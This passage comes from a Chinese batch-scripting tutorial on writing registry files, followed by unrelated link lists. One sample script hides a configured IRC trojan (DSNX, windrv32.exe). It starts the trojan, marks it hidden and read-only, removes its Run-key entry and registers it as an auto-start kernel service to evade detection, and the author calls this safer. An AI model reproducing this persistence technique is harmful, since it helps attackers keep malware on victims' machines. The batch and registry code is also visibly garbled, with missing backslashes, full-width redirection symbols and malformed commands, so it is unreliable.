[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]
”Ex4rch“=-
执行该脚本 , [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]下的”Ex4rch“就被删除了;
我们再看看删除一个子项 , 我们创建一个如下的脚本:
Windows Registry Editor Version 5.00
[-HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]
执行该脚本 , [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]就已经被删除了 。
相信看到这里 , .reg文件你基本已经掌握了 。那么现在的目标就是用批处理来创建特定内容的.reg文件了 , 记得我们前面说道的利用重定向符号可以很容易地创建特定类型的文件 。
samlpe1:如上面的那个例子 , 如想生成如下注册表文件
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]
”Invader“=”Ex4rch“
”door“=hex:255
”Autodos“=dword:000000128
只需要这样:
@echo Windows Registry Editor Version 5.00》》Sample.reg
@echo [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]》Sample.reg
@echo ”Invader“=”Ex4rch“》》Sample.reg
@echo ”door“=5》》C:/WINNT/system32/door.exe》》Sample.reg
@echo ”Autodos“=dword:02》》Sample.reg
samlpe2:
我们现在在使用一些比较老的木马时 , 可能会在注册表的 [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun(Runonce、 Runservices、Runexec)]下生成一个键值用来实现木马的自启动 。但是这样很容易暴露木马程序的路径 , 从而导致木马被查杀 , 相对地若是将 木马程序注册为系统服务则相对安全一些 。下面以配置好地IRC木马DSNX为例(名为windrv32.exe)
@start windrv32.exe
@attribhr windrv32.exe
@echo [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun] 》》patch.dll
@echo ”windsnx “=- 》》patch.dll
@sc.exe create Windriversrv type= kernel start= auto displayname= WindowsDriver binpath= c:winntsystem32windrv32.exe
@regedit /s patch.dll
@delete patch.dll
@REM [删除DSNXDE在注册表中的启动项 , 用sc.exe将之注册为系统关键性服务的同时将其属性设为隐藏和只读 , 并config为自启动]
@REM 这样不是更安全^_^.
六、精彩实例放送
1、删除win2k/xp系统默认共享的批处理
--------- cut here then save as .bat or .cmd file ---------
@echo preparing to delete all the default shares.when ready pres any key.
@pause
@echo off
:Rem check parameters if null show usage.
if {%1}=={} goto :Usage
:Rem code start.
echo.
echo---------
echo.
echo Now deleting all the default shares.
echo.
net share %1$ /delete
net share %2$ /delete
net share %3$ /delete
net share %4$ /delete
net share %5$ /delete
net share %6$ /delete
net share %7$ /delete
net share %8$ /delete
net share %9$ /delete
net stop Server
net start Server
echo.
echo All the shares have been deleteed
echo.
echo ---------
echo.
echo Now modify the registry to change the system default properties.
echo.
echo Now creating the registry file
echo Windows Registry Editor Version 5.00》 c:delshare.reg
echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServiceslanmanserverparameters]》》 c:delshare.reg
echo ”AutoShareWks“=dword:00000000》》 c:delshare.reg
echo ”AutoShareServer“=dword:00000000》》 c:delshare.reg
echo Nowing using the registry file to chang the system default properties.
regedit /s c:delshare.reg
echo Deleting the temprotarily files.
del c:delshare.reg
goto :END
:Usage
推荐阅读
- 如何添加本地打印机与共享网络上的打印机
- 蛇皮是什么意思网络用语
- 999什么意思网络流行语 999999什么意思网络流行语
- 槑是什么意思
- 养猪常用的中草药
- 欧派是什么意思
- 养猪场常用的疫苗
- 农村常用的养猪模式
- 坐火车流程 坐火车流程是什么
- 怎么设置个别短信加密 如何设置常用短信